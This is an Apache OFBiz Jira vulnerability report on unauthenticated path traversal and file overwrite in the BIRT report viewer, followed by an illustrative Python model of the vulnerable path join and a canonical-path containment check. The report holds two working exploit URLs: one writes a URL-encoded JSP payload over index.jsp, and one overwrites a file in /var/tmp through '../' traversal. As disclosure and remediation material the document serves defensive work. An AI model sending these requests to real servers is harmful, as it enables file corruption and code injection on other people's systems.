Nikita Podotykin created OFBIZ-12577:
----------------------------------------
Summary: Unauth Path Traversal with file corruption
Key: OFBIZ-12577
URL: https://issues.apache.org/jira/browse/OFBIZ-12577
Project: OFBiz
Issue Type: Bug
Affects Versions: 18.12.05
Reporter: Nikita Podotykin
Fix For: 18.12.05
Attachments: image-2022-02-21-15-54-00-257.png,
image-2022-02-21-15-54-51-612.png, image-2022-02-21-16-00-25-840.png
*Description of the vulnerability*
*Unauth Path Traversal with file corruption*
After reading a note (https://bugs.eclipse.org/bugs/show_bug.cgi?id=538142)
about a remote code execution (RCE) vulnerability in Birt, there was an attempt
to reproduce it.
https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/SalesReport.rptdesign&__format=pdf&__overwrite=true&__document=index.jsp&reportBy=%3C%25%0A%20%20out.println(%22OS%3A%20%22%20%2B%20System.getProperty(%22os.name%22))%3B%0A%20%20out.println(%22Current%20dir%3A%20%22%20%2B%20getServletContext().getRealPath(%22%2F%22))%3B%0A%25%3E%0A
I rewrote the system index.jsp file
(~/apache-ofbiz-18.12.05/plugins/birt/webapp/index.jsp),
corrupting it, but the payload didn't work. Before and after making the request
as an unauthorized user:
!image-2022-02-21-15-54-00-257.png!
When the index script is accessed, the server returns a 500 error.
!image-2022-02-21-15-54-51-612.png!
An unauthorized user can overwrite and corrupt files in the current folder. Can
it go beyond the current folder and overwrite, for example, the file /var/tmp/s3cReTfIle? Yes!
https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/SalesReport.rptdesign&__format=pdf&__overwrite=true&__document=../../../../../../../../var/tmp/s3cReTfIle&reportBy=test
!image-2022-02-21-16-00-25-840.png!
--
This message was sent by Atlassian Jira
(v8.20.1#820001)
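The sink the report exercises is the BIRT viewer's `__document` parameter: a caller-supplied file name joined onto the webapp directory and, with `__overwrite=true`, written to. The example below is added here to illustrate that mechanism and the containment check that would have stopped it; it is not OFBiz or BIRT code, and the function names, the base directory and the reuse of the reporter's second request as sample input are assumptions made for the example. It models the naive join (which turns the eight `../` segments into `/var/tmp/s3cReTfIle`) beside a hardened version that canonicalizes the candidate path and rejects anything that does not remain under the base directory, including absolute names.

```python
"""Model of the path-traversal sink described in OFBIZ-12577.

Illustrative code, not OFBiz or BIRT source: the names and the base
directory below are assumptions made for this example.
"""
import os
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample input: the second request from the report.
REPORTED_URL = (
    "https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/"
    "SalesReport.rptdesign&__format=pdf&__overwrite=true"
    "&__document=../../../../../../../../var/tmp/s3cReTfIle&reportBy=test"
)
# Assumed install location of the birt plugin webapp (not from the report).
WEBAPP_DIR = "/opt/ofbiz/plugins/birt/webapp"


def document_param(url: str) -> str:
    """Return the __document query parameter of a viewer URL ('' if absent)."""
    query = parse_qs(urlsplit(url).query)
    return query.get("__document", [""])[0]


def unsafe_output_path(base_dir: str, document: str) -> str:
    """The vulnerable pattern: append the caller-supplied name to the base
    directory and normalize. '../' segments walk out of base_dir, and
    normpath silently clamps at '/', so eight of them reach /var/tmp."""
    return os.path.normpath(os.path.join(base_dir, document))


def safe_output_path(base_dir: str, document: str) -> Optional[str]:
    """Hardened variant: canonicalize both sides and accept the candidate
    only if it is strictly inside base_dir. Returns None on any escape."""
    base = os.path.realpath(base_dir)
    # os.path.join discards base when `document` is absolute; realpath then
    # yields that absolute path, which the containment test below rejects.
    candidate = os.path.realpath(os.path.join(base, document))
    # commonpath is the robust containment test: a startswith() check would
    # accept '/opt/ofbiz/plugins/birt/webapp-evil' as being under the base.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if candidate == base:  # empty name or '.' would target the directory itself
        return None
    return candidate


if __name__ == "__main__":
    doc = document_param(REPORTED_URL)
    print("requested __document:", doc)
    print("naive join writes to:", unsafe_output_path(WEBAPP_DIR, doc))
    print("hardened join allows:", safe_output_path(WEBAPP_DIR, doc))
    print("legitimate name:     ", safe_output_path(WEBAPP_DIR, "index.jsp"))
```

The check is deliberately done on canonical paths rather than by stripping `..` from the string: the report's own first request shows a value with a leading `./` and the `__report` parameter with `./../`, and string filters tend to miss such mixed forms. Note that `safe_output_path` still allows `index.jsp` itself, so the webapp's own files remain writable; whether `__overwrite=true` should be honoured for an unauthenticated caller at all is a separate authorization question the check above does not answer.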